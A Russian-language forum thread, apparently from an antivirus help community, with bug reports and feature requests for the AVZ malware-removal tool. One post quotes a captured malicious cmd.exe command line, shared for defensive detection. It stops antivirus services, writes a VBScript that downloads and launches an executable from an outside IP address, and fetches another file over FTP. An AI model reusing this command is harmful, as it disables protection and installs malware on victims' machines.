Олег, может имеет смысл добавить avz_ru.cmd и avz_en.cmd прями в архив с программой, чтобы пользователи не мучались?

----------


## NickGolovko

Мотивируют тем, что в ряде случаев им достаточно запросить лог одного диспетчера и не прогонять полностью все исследование системы. Я, кстати, тоже иногда прошу лог конкретного менеджера.  :Smiley:

----------


## Макcим

Кажется мой вопрос остался без ответа  Почему при выполнении скрипта №3 AVZ запрещено настройкой удалять руткиты?

----------


## Xen

Проявилась еще одна проблема, Win XP Home SP2 Rus:




> 9. Мастер поиска и устранения проблем
>  >>  Нарушение ассоциации REG файлов


Ассоциация с виду в порядке, если надо, могу скинуть соответствующие ветки реестра.

И два предложения:

1. Писать в программе полную версию билда, а не просто 4.29
2. Распространять дистрибутив через торренты, если агава не справляется. Все же лучше, чем рапидшара =)

----------


## Зайцев Олег

> Кажется мой вопрос остался без ответа  Почему при выполнении скрипта №3 AVZ запрещено настройкой удалять руткиты?


Не запрещено, а не разрешено. Если перед выполнением скриптов это разрешить в настройке, то они удаляться. Так было исторически, руткит относится к категории HackTool (равно как эксплоиты, hacktools и т.п.)

----------


## Макcим

> 2. Распространять дистрибутив через торренты, если агава не справляется. Все же лучше, чем рапидшара =)


Можно сделать зеркало у нас.

*Добавлено через 2 минуты*




> Не запрещено, а не разрешено. Если перед выполнением скриптов это разрешить в настройке, то они удаляться. Так было исторически, руткит относится к категории HackTool (равно как эксплоиты, hacktools и т.п.)


Может забыть историю и перенести руткиты в другую категорию? Жалко хелперов, зачем вручную удалять то, что AVZ не плохо почистит сам на автоматике во время сбора логов?

----------


## Xen

3. Не во всех менеджерах возможно скопировать в карантин.

----------


## santy

> ...В исследовании системы можно генерировать лог с любым набором данных, сохранение протокола из каждого менеджера - это пережиток старых версий, где не было исследования системы.


Олег, реально с помощью АВЗ получить исследование удаленной системы? Выполнить анализ лога исследования и автоматически сгенерировать скрипт выполнения, который можно интерактивно поправить... т.е. иметь в составе АВЗ визард-инструмент(типа LC5), который позволяет по ip/mac адресу или путем выбора из сетевого окружения исследовать удаленную систему.

----------


## Jef239

> иметь в составе АВЗ визард-инструмент(типа LC5), который позволяет по ip/mac адресу или путем выбора из сетевого окружения исследовать удаленную систему.


Опосля чего остальные антивирусы запишут AVZ в зловреды? 
Гм, возможности AVZ настолько широки, что очень не хотелось бы, чтобы кто-то мог удалённо управлять моей машиной.
Так что если делать - то по специальному ключу и так далее.

----------


## santy

> Опосля чего остальные антивирусы запишут AVZ в зловреды? 
> Гм, возможности AVZ настолько широки, что очень не хотелось бы, чтобы кто-то мог удалённо управлять моей машиной.
> Так что если делать - то по специальному ключу и так далее.


Так все равно это делает юзер с помощью Gain&Abel, Ideal Administration, DameWare Utilities - правда, с админскими правами на удаленной системе.

----------


## Jef239

> Так все равно это делает юзер с помощью Gain&Abel, Ideal Administration, DameWare Utilities - правда, с админскими правами на удаленной системе.


Или хакер при помощи какого-нибудь трояна вроде BackOffice.
Фишка в том, что лично я иметь AVZ на своей машине хочу. А потенциальную дырку для хакера - как-то не хочется. Я лучше имеющиеся в виндах дырки прикрою.
А клиенту админские права на удалённой машине ОБЯЗАТЕЛЬНО должны быть нужны. Даже если это корпоративная сеть без инета. Иначе - НЕБЕЗОПАСНО. Уж слишком много опасного умеет делать AVZ.

----------


## Зайцев Олег

> Олег, реально с помощью АВЗ получить исследование удаленной системы? Выполнить анализ лога исследования и автоматически сгенерировать скрипт выполнения, который можно интерактивно поправить... т.е. иметь в составе АВЗ визард-инструмент(типа LC5), который позволяет по ip/mac адресу или путем выбора из сетевого окружения исследовать удаленную систему.


Технически я могу конечно ввести в AVZ некую фичу типа RAdmin, которая даст доступ к экрану и клавиатуре/мышке. Если рассуждать чисто гипотетически, то в случае введения этой опции она будет активироваться через меню, функционировать только на сеанс и только пока запущен AVZ, причем для активации нужно будет задавать IP "помошника", его логин, пароль. С другой стороны, сколь актуальна подобная фича ? Ее плюс конечно несомненен - хелпер в сложной ситуации сможет напрямую подключиться к ПК для лечения, минус также несомненен - по сути это "дырка" в безопасности, пусть небольшая, но дырка.
Другой путь решения - это удаленный запуск AVZ с применением скрипта, который изучит систему и пошлет логи куда сказано. Там их изучат, и будет выполнен удаленный запуск AVZ с выполнением скрипта карантина и лечения. По сути идея идентична разделу "Помогите", но с автоматическим запуском - такое применяется у меня в конторе на всех ПК.
Наконец третий вариант самый правильный - это хелпдеск, связанный с ядром AVZ. Т.е. ядро изучает систему, шлет данные хелпдеску (автоматом, через почту при помощи юзера и т.п.). Хелпдеск изучает их с помощью ИР, формирует скрипт (правильный по его мнению) и подключает хелпера. Хелпер изучает предложение ИР, вносит в случае надобности корректуры, далее скрипт идет юзеру, результат - хелпдеску и т.п. по кругу. В данном случае плюс в том, что явного удаленного управления нет, юзер может изучить скрипты и отсылаемые логи, и обмен идет не с ПК некого хелпера (который юзеру в принципе неизвестен), а с хелпдеском, размещенным у уважаемого AV вендора, выступающего в данном случае гарантом безопасности всей этой цепочки. В этой ситуации хелпдеск будет еще и защитой от "хелпера-терориста", так как блокирует явные ошибки в скриптах типа удаления легитимного ПО.

----------


## drongo

Я за третий вариант  :Wink:

----------


## santy

Был бы интересен такой вариант: (естественно, без удаленного управления.... потому что админ по любому сможет в лок.сети подключиться к удаленной системе и запустить АВЗ с общедоступного ресурса). админ, запускает АВЗ на СВОЕЙ машине, запускает процесс исследования на удаленной машине, получает вывод в таблицы_окна, аналогично как мы видим СВОИ процессы, службы, драйвера, автозагрузку и т.д. в менеджерах сервиса с полным анализом процессов, служб, драйверов по базе безопасных файлов АВЗ. Но, соответственно, без (а может с такой возможностью!!!) возможности kill process, добавить в карантин и т.д.. Далее, после просмотра таблицы данных админом запускается анализ и автоматическая генерация скрипта, если необходимо его выполнение.... Т.е. интересно было бы не автоматическое и периодическое сканирование системы - а, тогда, когда в этом есть необходимость, по каким то признакам заражения....

----------


## maXmo

> 1) Просмотр родителя процесса. (смотрел утилитой pslist от Русиновича)


может process explorer того же Руссиновича.




> 2) Просмотр командной строки, с которой запущен процесс.


может, пути к исполняемому файлу? Тоже может procexp. А всю командную строку получить будет затруднительно, да и незачем.

----------


## Зайцев Олег

> может process explorer того же Руссиновича.
> 
> может, пути к исполняемому файлу? Тоже может procexp. А всю командную строку получить будет затруднительно, да и незачем.


AVZ в исследовании системы показывает командную строку запущенных процессов (в крайней правой колонке, в качестве примечания). 
А вот отображение родительского процесса стоит сделать, это несложно

----------


## Jef239

> Был бы интересен такой вариант:


Олег, до меня кажется дошло, что он принципиально нового хочет. Грубо говоря - вычитку XML-логов в формы AVZ. Желательно - с генерацией скрипта по нажатиям кнопок в формах AVZ. Остальное - технические детали пересылки, её можно пока и почтой делать.

Насколько это реально?

*Добавлено через 56 минут*




> AVZ в исследовании системы показывает командную строку запущенных процессов (в крайней правой колонке, в качестве примечания).


Гм, а антивирусный поиск в ней сложно сделать? Я про случай, когда когда законный CMD.EXE выполняет вирусный код. В принципе AVZ может сам отловить это.




> А вот отображение родительского процесса стоит сделать, это несложно


СПАСИБО!

А вот и командная строчка
_F:\WINNT\system32\cmd.exe /c net stop "Norton AntiVirus Auto Protect Service"&net stop Mcshield&net stop "Panda Antivirus"&echo dim HTTPGET>c:\1.vbs&echo dim Data>>c:\1.vbs&echo dim ExeURL>>c:\1.vbs&echo dim LocalPath>>c:\1.vbs&echo.>>c:\1.vbs&echo ExeURL = "http://91.122.0.103:2904/84785_mssql.exe">>c:\1.vbs&echo LocalPath = "c:\windmns.exe">>c:\1.vbs&echo.>>c:\1.vbs&ech  o Set HTTPGET = CreateObject("Microsoft" ^& chr(46) ^& "XMLHTTP")>>c:\1.vbs&echo Set Data = CreateObject("ADODB" ^& chr(46) ^& "Stream")>>c:\1.vbs&echo.>>c:\1.vbs&echo HTTPGET.Open "GET", ExeURL, false>>c:\1.vbs&echo HTTPGET.Send>>c:\1.vbs&echo.>>c:\1.vbs&echo Const adTypeBinary = ^1>>c:\1.vbs&echo Const adSaveCreateOverWrite = ^2>>c:\1.vbs&echo.>>c:\1.vbs&echo Data.Type = adTypeBinary>>c:\1.vbs&echo Data.Open>>c:\1.vbs&echo Data.Write HTTPGET.ResponseBody>>c:\1.vbs&echo Data.SaveToFile LocalPath, adSaveCreateOverWrite>>c:\1.vbs&cscript //Nologo /B c:\1.vbs&del c:\1.vbs&start c:\windmns.exe&echo OPEN 91.122.0.103 16467>x&echo GET 27031_mssql.exe>>x&echo QUIT>>x&FTP -n -s:x&27031_mssql.exe&del x&exit_

----------


## NickGolovko

Олег,

посмотрите, пожалуйста, на строку Автозапуска в протоколе, которая гласит

C:\WINDOWS\S

HJT показывает на ее месте

O4 - HKCU\..\Run: [Gpn] C:\WINDOWS\S?mantec\msdtc.exe

Из-за этого я забыл этот файл в скрипте пользователю.  :Smiley:  Подозреваю, что подобное бывало и ранее, но спрашиваю: фиксабельно?  :Smiley:

----------


## Jef239

Олег, а почему для процесса номер 8 показывается файл \WINNT\System? Более того, он запихивается в картантин, что явно не порядок.
8 - это idle process, он с файлом не связан. Так что - всегда зелёное исключение должно быть.

----------


## zerocorporated

Косяк нашёл в avz: В диспетчере процессов если как показано на рисунку взять и перетащить разделение 2 таблиц само вверх, то нижняя таблица под верхнюю залазит что элементов управления нижней не видно.

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## aintrust

@ *Jef239*

Это что-то новенькое... =)

Процесс с PID 8 под Windows 2k (речь идет о ней, насколько я понял) - это _System_, а не _System Idle Process_ (этот псевдо-процесс всегда имеет PID 0). Насчет черного цвета для процесса _System_ - да, непорядок, неплохо бы это поправить, чтобы не сбивать с толку.

Только вот с карантином непонятно... Что у вас туда попало, какой именно файл?

@ *zerocorporated*

У меня такого эффекта не наблюдается, все отображается абсолютно корректно...

PS. "Спасибо" случайно нажал, рука дрогнула... Надеюсь, вы не в обиде? =) Пусть это "спасибо" будет просто за ваши заслуги в разделе "Помогите!", ОК?

----------


## Зайцев Олег

> @ *Jef239*
> 
> Это что-то новенькое... =)
> 
> Процесс с PID 8 под Windows 2k (речь идет о ней, насколько я понял) - это _System_, а не _System Idle Process_ (этот псевдо-процесс всегда имеет PID 0). Насчет черного цвета для процесса _System_ - да, непорядок, неплохо бы это поправить, чтобы не сбивать с толку.
> 
> Только вот с карантином непонятно... Что у вас туда попало, какой именно файл?
> 
> @ *zerocorporated*
> ...


Я знаю про карантин System, это мелкий баг ... Там все просто, AVZ не находит файл, и обращается к системе прямого чтения диска с запросом - и система читает ему кусок с диска, обычно это собсвенно содержимое папки с таким именем.

----------


## NickGolovko

А мой вопрос на предыдущей странице?  :Smiley:

----------


## Зайцев Олег

> Олег,
> 
> посмотрите, пожалуйста, на строку Автозапуска в протоколе, которая гласит
> 
> C:\WINDOWS\S
> 
> HJT показывает на ее месте
> 
> O4 - HKCU\..\Run: [Gpn] C:\WINDOWS\S?mantec\msdtc.exe
> ...


На месте знака ? стоит какой-то непечатный символ, который AVZ воспринял как разделитель. В теории это можно поймать, я думаю как

----------


## aintrust

> AVZ не находит файл, и обращается к системе прямого чтения диска с запросом - и система читает ему кусок с диска, обычно это собсвенно содержимое папки с таким именем.


Однако! =)

----------


## Bratez

Олег, посмотрите пожалуйста логи в этом сообщении:
http://virusinfo.info/showpost.php?p=162129&postcount=6
Чем объяснить, что в логе HJT видно:



> O20 - Winlogon Notify: ovrscn - C:\WINDOWS\SYSTEM32\ovrscn.dll


а в AVZ - нет?

----------


## aintrust

А файл этот есть на диске?

----------


## Макcим

Есть запись в реестре, которую нужно показать в любом случае.

----------


## Зайцев Олег

> Есть запись в реестре, которую нужно показать в любом случае.


Возможна ситуация, что файл чистый - тогда запись подавится

----------


## Макcим

Да не похоже ;( http://virusinfo.info/showthread.php?t=12651

----------


## Romero

объясните пожалуйста обозначение результата сканирования
вот цитирую часть лога




> Анализ kernel32.dll, таблица экспорта найдена в секции .text
> Функция kernel32.dll:CopyFileA (62) перехвачена, метод ProcAddressHijack.GetProcAddress ->77E711B9->77ED6D7B
> Перехватчик kernel32.dll:CopyFileA (62) нейтрализован
> Функция kernel32.dll:CopyFileExA (63) перехвачена, метод ProcAddressHijack.GetProcAddress ->77EB1E41->77ED6D8A
> 
> Перехватчик kernel32.dll:CreateProcessW (100) нейтрализован
> Функция kernel32.dlleleteFileA (125) перехвачена, метод ProcAddressHijack.GetProcAddress ->77E7177A->77ED6DB7
> Перехватчик kernel32.dlleleteFileA (125) нейтрализован
> Функция kernel32.dlleleteFileW (126) перехвачена, метод ProcAddressHijack.GetProcAddress ->77E71660->77ED6F1F
> ...


я так и не понял, программа обнаружила Руткит или нет?

----------


## rubin

В ходе сканирования программа снимает хуки и следит за перехватами.

Тут у Вас перехват от cmdmon.sys, но читаем дальше:


```
Функция NtConnectPort (1F) перехвачена (8057FED0->F2A710D2), перехватчик D:\WINDOWS\System32\DRIVERS\cmdmon.sys, драйвер опознан как безопасный
```

Т.е. это не руткит.
Конкретно тут - cmdmon.sys от Comodo Firewall, klif.sys - от Антивируса Касперского

----------


## Jef239

> @ *Jef239*
> Процесс с PID 8 под Windows 2k (речь идет о ней, насколько я понял) - это _System_, а не _System Idle__ Process_ (этот псевдо-процесс всегда имеет PID 0).


Угу, описался.




> Только вот с карантином непонятно... Что у вас туда попало, какой именно файл?


О!!!!!!!!!! Полюбуйся!!!!!!!!!!!!!!!! ROTFL! Да, фактическая длина dta -8192 байта. А ты разве не тестер, что не заметил такое чудо?



```
Ошибка карантина файла, попытка прямого чтения (F:\WINNT\System)
 Карантин с использованием прямого чтения - ОК
Файл успешно помещен в карантин (F:\WINNT\System)
```



```
[InfectedFile]
Src=F:\WINNT\System
Infected=avz00104.dta
Virus=Скопирован автоматически из диспетчера процессов
QDate=19.12.2007 0:11:38
Size=0
MD5=EF8BE0A44DDA0FBFEC365549DE09BA97
```

----------


## Jef239

> @ *zerocorporated*
> 
> У меня такого эффекта не наблюдается, все отображается абсолютно корректно...


Или у тебя в XP иначе, или ты не понял как смотреть. Передвигаешь сплитер вверх, за границу Constraints.MinHeight. Отпускаешь сплитер. Он уставливается по MinHeight. И видишь описанный эффект.
Кроме того, что описано, не виден сплитер. 



Для визуального пропадания эффекта нужно сделать rearrange, например, путём максимизации или нормализации окна.

----------


## Bratez

*Команда DeleteService не работает,*
не только для активного, но и для отключенного сервиса/драйвера!

Подозрение возникло после использования в двух-трех темах в "Помогите". Провел эксперимент на собственном компьютере и убедился - не работает  :Sad: .

----------


## santy

> Другой путь решения - это удаленный запуск AVZ с применением скрипта, который изучит систему и пошлет логи куда сказано. Там их изучат, и будет выполнен удаленный запуск AVZ с выполнением скрипта карантина и лечения. По сути идея идентична разделу "Помогите", но с автоматическим запуском - такое применяется у меня в конторе на всех ПК.


этот вариант, действительно можно реализовать, использую планировщик заданий, либо системный, либо встроенный в антивирусные программы... тем более, что через консоль управления (Enterprise Edition) можно любому компьютеру поставить задание удаленного запуска AVZ с получением лога исследования и с выполнением уже готового скрипта лечения.




> Наконец третий вариант самый правильный - это хелпдеск, связанный с ядром AVZ. Т.е. ядро изучает систему, шлет данные хелпдеску (автоматом, через почту при помощи юзера и т.п.). Хелпдеск изучает их с помощью ИР, формирует скрипт (правильный по его мнению) и подключает хелпера. Хелпер изучает предложение ИР, вносит в случае надобности корректуры, далее скрипт идет юзеру, результат - хелпдеску и т.п. по кругу. В данном случае плюс в том, что явного удаленного управления нет, юзер может изучить скрипты и отсылаемые логи, и обмен идет не с ПК некого хелпера (который юзеру в принципе неизвестен), а с хелпдеском, размещенным у уважаемого AV вендора, выступающего в данном случае гарантом безопасности всей этой цепочки. В этой ситуации хелпдеск будет еще и защитой от "хелпера-терориста", так как блокирует явные ошибки в скриптах типа удаления легитимного ПО.


ИР???  Олег, а почему не встроить уже сейчас анализатор логов в редактор скриптов, например? А редактор скриптов включить бы в меню АВЗ. Как-то выпадает из поля зрения. Там ведь многое уже автоматизировано.... Тогда анализатор прошел бы хорошее тестирование... можно визуально видеть лог, и сопоставить его с генерируемым скриптом... а на сервере... конечно... логи складываются в базу данных и анализатор работает с вновь прибывающими в базу записями. Это хорошее решение.

----------


## Bratez

Меня всегда очень удивляет, почему вот эта, набившая оскомину служба:


```
O23 - Service: FCI - Unknown owner - C:\WINDOWS\system32\svchost.exe:ext.exe (file missing)
```

никогда не отображается в логе AVZ - ни в прежних версиях, ни в новой?
Свежий пример тут:
http://virusinfo.info/showthread.php?t=15469

----------


## Зайцев Олег

> Меня всегда очень удивляет, почему вот эта, набившая оскомину служба:
> 
> 
> ```
> O23 - Service: FCI - Unknown owner - C:\WINDOWS\system32\svchost.exe:ext.exe (file missing)
> ```
> 
> никогда не отображается в логе AVZ - ни в прежних версиях, ни в новой?
> Свежий пример тут:
> http://virusinfo.info/showthread.php?t=15469


Если служба реально существует, и у нее задан реальный тип автозапуска, то AVZ ее покажет. И файл покажет ... в виде:
с:\windows\system32\svchost.exe:ext.exe:$DATA >>> Опасно - исполняемый файл в потоке NTFS - возможно, маскировка исполняемого файла 

А вот хвост в реестре, тем более при отсутствии файла, AVZ не покажет

*Добавлено через 6 минут*




> ИР??? Олег, а почему не встроить уже сейчас анализатор логов в редактор скриптов, например? А редактор скриптов включить бы в меню АВЗ. Как-то выпадает из поля зрения. Там ведь многое уже автоматизировано.... Тогда анализатор прошел бы хорошее тестирование... можно визуально видеть лог, и сопоставить его с генерируемым скриптом... а на сервере... конечно... логи складываются в базу данных и анализатор работает с вновь прибывающими в базу записями. Это хорошее решение.


А все дело в том, что для анализатора нужна стационарная база + много чего еще, это очень громоздакая технология. Очень мощная, но очень громоздкая. Под нее мощный сервак нужен, база и прочее

*Добавлено через 2 минуты*




> *Команда DeleteService не работает,*
> не только для активного, но и для отключенного сервиса/драйвера!
> 
> Подозрение возникло после использования в двух-трех темах в "Помогите". Провел эксперимент на собственном компьютере и убедился - не работает .


Да, баг подтверждаю, он появился в 4.29. Сейчас исправлю, апдейт будет сегодня-завтра (перевод уже выверен, остальные баги закрыты)

----------


## Макcим

> Да, баг подтверждаю, он появился в 4.29. Сейчас исправлю, апдейт будет сегодня-завтра (перевод уже выверен, остальные баги закрыты)


Добавьте кнопочку "Карантин через BC". Очень прошу...

----------


## Geser

> А вот хвост в реестре, тем более при отсутствии файла, AVZ не покажет


Я с этим категорически не согласен. Это огромная дыра в АВЗ сквозь которую проходят и будут проходить руткиты. Показано должно всё что есть в реестре, не зависимо от параметров запуска и наличия файла на диске.

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Ego1st

Согласен с Geser, давно уже хотел об этом сказать, информация о системе небывает лишней..

----------


## Макcим

Поддерживаю.

----------


## pig

Присоединяюсь. Такие штуки надо показывать:
- либо это активный зловред, которого надо мочить
- либо это мусор, который надо убирать

----------


## XL

Кстати, мое сообщение в теме о версии 4.27 относительно данного зеленого сервиса (ICF = svchost.exe:exe.exe) в логе диспетчера сервисов так и осталось без ответа. Ведь служба показывается зеленым в диспетчере служб, а значит считается безопасной! Поэтому и в отчет исследования системы не попадает...

----------


## drongo

Для удобства : для раздела автозапуска в логе  добавить также кнопочки удаления  :Wink:

----------


## Ego1st

> Кстати, мое сообщение в теме о версии 4.27 относительно данного зеленого сервиса (ICF = svchost.exe:exe.exe) в логе диспетчера сервисов так и осталось без ответа. Ведь служба показывается зеленым в диспетчере служб, а значит считается безопасной! Поэтому и в отчет исследования системы не попадает...


угу я писал об этом, тоже..

----------


## NickGolovko

> Я с этим категорически не согласен. Это огромная дыра в АВЗ сквозь которую проходят и будут проходить руткиты. Показано должно всё что есть в реестре, не зависимо от параметров запуска и наличия файла на диске.


Я видел несколько раз в отчетах хвосты из реестра. Файла нет, запись есть.

*Добавлено через 6 минут*




> Кстати, мое сообщение в теме о версии 4.27 относительно данного зеленого сервиса (ICF = svchost.exe:exe.exe) в логе диспетчера сервисов так и осталось без ответа. Ведь служба показывается зеленым в диспетчере служб, а значит считается безопасной! Поэтому и в отчет исследования системы не попадает...


Как я понимаю, AVZ смотрит на исполняемый файл svchost.exe, а не на файл в его потоке.

----------


## drongo

записи зловредов надо удалять даже если файла самого нет. Если уж взляли на себя лозунг :" за чистый интернет" - надо соблюдать  :Wink: 
кстати о том что не хватает в avz , а есть в hijackthis.  
 в hijackthis есть строчки с 012 ( плагины експлорера , если не ошибаюсь)нет этого в логе AVZ . Вот явное доказательство : 
C:\Programme\Internet Explorer\Plugins\NPUPano.dll нет упоминания данного файла в логах AVZ.
http://virusinfo.info/showthread.php...933#post162933

----------


## zerocorporated

Вот что за глюк нашёл: При устранение проблемы "Отключить кэширование данных, полученных по защищенному протоколу" Создаётся ключ:


```
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Internet Settings
DWord DisableCachingOfSSLPages = 1
```

Тут опечатка как мне кажется в слове Current Version лишний пробел!

----------


## XL

> Как я понимаю, AVZ смотрит на исполняемый файл svchost.exe, а не на файл в его потоке.


Угу, похоже что так. Значит, надо научить avz еще и stream'ы проверять в таком случае...

----------


## Макcим

Есть подозрение, что команда DelCLSID тоже не работает...

----------


## rubin

Хм, я в какой-то из тем применял - работало

----------


## Макcим

В том то и дело, что работает через раз.

----------


## Bratez

> Есть подозрение, что команда DelCLSID тоже не работает...


Аналогично.
Вот DelBHO точно работает, и это радует .

----------


## Зайцев Олег

> В том то и дело, что работает через раз.


Не через раз, а с точной математичсекой закономерностью. Это уже пофиксено. Релиз - в субботу. Можно было бы и сегодня, но я хочу с ADS и битыми службами решить вопрос, чтобы релизы не плодить

----------


## Макcим

> Не через раз, а с точной математической закономерностью. Это уже пофиксено.


Извините, не хотел обидеть. За релиз спасибо.

----------


## Geser

http://virusinfo.info/showpost.php?p=163059&postcount=6
Это пару раз уже видел. Отловлен баг?

----------


## Зайцев Олег

> http://virusinfo.info/showpost.php?p=163059&postcount=6
> Это пару раз уже видел. Отловлен баг?


Нет. Он возникает на W2K SP4, я ловлю его

----------


## UFANych

А вот старый вопрос (я уже его поднимал) - на консоли W2k с работающим сервером терминалов AVZ некоторые пути указывает совсем не в тему.
В частности, 
1. При работе на консоли, если пользователю средствами AD задан домашний диск (см. рис. 1), то и в диспетчере процессов AVZ, и во многих других местах вместо правильного пути c:\windows\blala указывается p:\windows\blabla
2. При работе в терминальной сессии тоже часть путей показывается неправильно. Иллюстрация - рис. 2 - вообще уникально - AVZ сумел исказить путь из ярлыка! Там то чего искать? 
Хотя, покопавшись, нашёл вот что - если свойства ярлыка открыть через плагин EMenu к FARу, то путь действительно такой, как показывает AVZ, то есть как на рис.3 (from_far.png). Если же этот ярлык найти в меню и узнать его свойства там, то получаем рис.4 (from_menu.png)
Вот такой блин терминал. Соответственно, как то трудновато использовать AVZ там.

----------


## Jef239

> Нет. Он возникает на W2K SP4, я ловлю его


Олег, хочешь я под дельфийским отладчиком посмотрю в чём там дело?

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## drongo

Олег, у тебя наверное л.с. забит, поэтому пишу тут :
 Насчёт ближайшего релиза -
Не забудь пожалуйста обновить  исправления в английской части программы и хепл английский включить в зип, тзкже  чтобы автоматом выбирался английский хелп , когда в английском интерфейсе запускаеться программа  :Wink:

----------


## Зайцев Олег

> Олег, хочешь я под дельфийским отладчиком посмотрю в чём там дело?


Отладчик даст место (я его и так знаю), но не причну - поэтому не стоит терять времени. Гораздо интереснее другое - тест на чистом W2K, чтобы понять, это проблема AVZ + W2K или AVZ + W2K + Outpost

----------


## NickGolovko

> Олег, у тебя наверное л.с. забит, поэтому пишу тут :
>  Насчёт ближайшего релиза -
> Не забудь пожалуйста обновить  исправления в английской части программы и хепл английский включить в зип, тзкже  чтобы автоматом выбирался английский хелп , когда в английском интерфейсе запускаеться программа


+1

 :Smiley:

----------


## Биомеханик

А принципиально нового в AVZ не планируеться?

----------


## zerocorporated

Так как смотрю что вредоносные программы часто помешают себя в некоторые каталоги, может в отчете avz показывать список потенциально опасных файлов в директориях в которых они по идее не должны находится например(Все без подкаталогов):


```
Тут искать *.exe *.dll *.sys *.com *.pif *.bat *.cmd *.vbs *.js *.ocx
C:\WINDOWS\Temp
C:\Documents and Settings\%username%\Local Settings\Temp
C:\WINDOWS\Downloaded Program Files
C:\Documents and Settings\%username%\Local Settings\Temporary Internet Files
C:\Program Files
C:\Documents and Settings\All Users\Application Data

Исключить *.sys
C:\WINDOWS\system32\drivers

Исключить *.dll
C:\WINDOWS\system



Искать только *.sys
C:\WINDOWS\system32
C:\WINDOWS

Искать только *.exe *.dll *.vbs *.js *.ocx
C:\
```

Правда размер лога может вырасти...

----------


## Jef239

> Гораздо интереснее другое - тест на чистом W2K, чтобы понять, это проблема AVZ + W2K или AVZ + W2K + Outpost


При остановленном Outpost (и EXE и сервис) эффект тот же. Выгрузить ещё и драйвера?

----------


## AndreyKa

В теме http://virusinfo.info/showthread.php?t=15556
странные пути у файлов в секции "Модули пространства ядра". С переменной 
%SystemRoot% все в прорядке. Может ли это быть вызвано нестандартным именем папки для установки Windows (C:\WINDOWS.1)?

----------


## pig

> При остановленном Outpost (и EXE и сервис) эффект тот же. Выгрузить ещё и драйвера?


Обязательно. Драйвера как раз самые подозреваемые и есть.

----------


## Jef239

> Обязательно. Драйвера как раз самые подозреваемые и есть.


Анинсталировал Outpost вообще. Запустил AVZ - баг на месте. То есть это вообще не OutPost виноват. А именно SP4. Какие дальше эксперименты делать?

Олег, может быть ты скажешь, где взять текст стандартного скрипта номер 2, а я посмотрю, на какой команде (группе команд) этого скрипта лажает? Да, почти наверняка оно валится на VarClear. Возможно потому, что в вариантной переменной юникодная строка (или мусор). Если ОЧЕНЬ надо - могу под отладчиком посмотреть, где оно всё-таки падает. Но мне будет легче смотреть, если будет известна одна операция скрипта, а не ждать пока весь скрипт пройдёт.

Ещё вариант - можешь обвещшать все вариантные операции отладочной инофрмацией, а я запущу у себя и пришлю трассу.

P.S. У меня фактически preSP5 стоит. То есть все последние патчи + выходивший где-то год назад preSP5.

----------


## XL

Да, и еще мои 5 рублей по поводу нововведений в 4.29
Есть основания говорить, что в подозрительные объекты в отчете исследования системы попадает не все. Например, драйверы с цифровой подписью, которые ничего не перехватывают, но при этом загружены в память и являются явными зловредами:



> C:\WINDOWS\System32\Drivers\ndisrd.sys NDISRD helper driver Copyright *NT Kernel Resources© 2002-2003*


Хотя, если подумать, то автоматику тут использовать почти невозможно. Если только она сама гуглить не станет по именам файлов...
Прикрепил архив с отчетом, который иллюстрирует ситуацию.
Очевидно, как раз для таких случаев и потребуется helpdesk...

----------


## Geser

У меня 2 предложения по АВЗ. 
1. Иногда трояны подменяют собой системные файлы, и при их удалении система не поднимается. Думаю стоит добавить в АВЗ базу данных имён системных файлов (включая полный путь, конечно) и помечать такие файлы в логе. Так хелперы смогут понять что нельзя просто удалять файл, а нужно его заменить на чистый.
Если это проблемно с точки зрения объёма базы, то хотя бы писать в неё файлы которые наиболее часто подменяются троянами.
2. Иногда системные файлы не изменяются, а просто в реестре изменяется ссылка, на файл трояна. Опять же, в случае удаления система не поднимится. Предлагаю так же добавить базу данных ключей изменяемых троянами, и выдавать предупреждения в случае если они ссылаются на файлы отличные от стандартных.

----------


## Зайцев Олег

> У меня 2 предложения по АВЗ. 
> 1. Иногда трояны подменяют собой системные файлы, и при их удалении система не поднимается. Думаю стоит добавить в АВЗ базу данных имён системных файлов (включая полный путь, конечно) и помечать такие файлы в логе. Так хелперы смогут понять что нельзя просто удалять файл, а нужно его заменить на чистый.
> Если это проблемно с точки зрения объёма базы, то хотя бы писать в неё файлы которые наиболее часто подменяются троянами.
> 2. Иногда системные файлы не изменяются, а просто в реестре изменяется ссылка, на файл трояна. Опять же, в случае удаления система не поднимится. Предлагаю так же добавить базу данных ключей изменяемых троянами, и выдавать предупреждения в случае если они ссылаются на файлы отличные от стандартных.


Принимается. Это уже реализовано, и первое, и второе ... в версии 4.29. Осталось только базы набить ..

----------


## Geser

> Принимается. Это уже реализовано, и первое, и второе ... в версии 4.29. Осталось только базы набить ..


Я еще не копался в новой версии. Я так понял что это сейчас в визардах. Но нужно что бы пометки были в соответствующих разделах HTML отчета. Т.е. если это процесс, то в списке процессов и т.д. 
Лучше также убрать для таких файлов в HTML отчете ссылки на автогенерацию комманд удаления. Так меньше шансов что хелпер по ошибке их все же удалит.

----------


## santy

Есть ли новый, исправленный релиз (> 4.29.0.9)?

----------


## Jef239

> Есть ли новый, исправленный релиз (> 4.29.0.9)?


Только что скачал - на сайте по-прежнему 4.29.0.9

----------


## Geser

Посмотрел лог новой версии. Очень понравилось что теперь для драйверов есть как опция удалить файл, так и опция остановить/удалить... службу.
Предлагаю для всех остальных объектов автозапуска добавить опцию удаления ключа из реестра.
Думаю так же будет полезно хинтом прописывать полный путь к этому ключу и его значение

----------


## barsukRed

В версии 4.29 при использовании ревизора: база создается,но при сравнении диск<>база,при выборе файла базы, в строке _тип файлов_ стоит:*$AVZ1129*. Соответственно не запускается проверка. Скачал еще раз архив с АВЗ. Все тоже самое. В версии 4.27 все как надо в этой строке:*Файлы ревизора(*.frz)*

----------


## NickGolovko

Это не только с файлами ревизора, но и со всеми прочими диалогами.  :Smiley:

----------


## Зайцев Олег

> В версии 4.29 при использовании ревизора: база создается,но при сравнении диск<>база,при выборе файла базы, в строке _тип файлов_ стоит:*$AVZ1129*. Соответственно не запускается проверка. Скачал еще раз архив с АВЗ. Все тоже самое. В версии 4.27 все как надо в этой строке:*Файлы ревизора(*.frz)*


Это баг - исправлено

----------


## Макcим

Олег, Вы сообщите о выходе исправленной версии?

----------

